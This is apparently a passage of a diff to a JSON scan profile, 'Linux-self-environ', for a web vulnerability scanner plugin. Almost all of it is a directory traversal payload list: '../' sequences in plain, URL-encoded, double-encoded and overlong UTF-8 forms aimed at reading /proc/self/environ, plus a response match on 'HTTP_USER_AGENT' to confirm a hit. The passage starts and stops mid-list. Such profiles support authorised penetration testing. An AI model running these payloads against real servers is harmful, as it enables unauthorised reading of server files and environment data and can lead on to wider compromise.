\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,HTTP_USER_AGENT"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-self-environ","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-self-environ","RemediationDetail":"","IssueBackground":"Linux-self-environ","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"proc/self/environ","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-self-environ",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
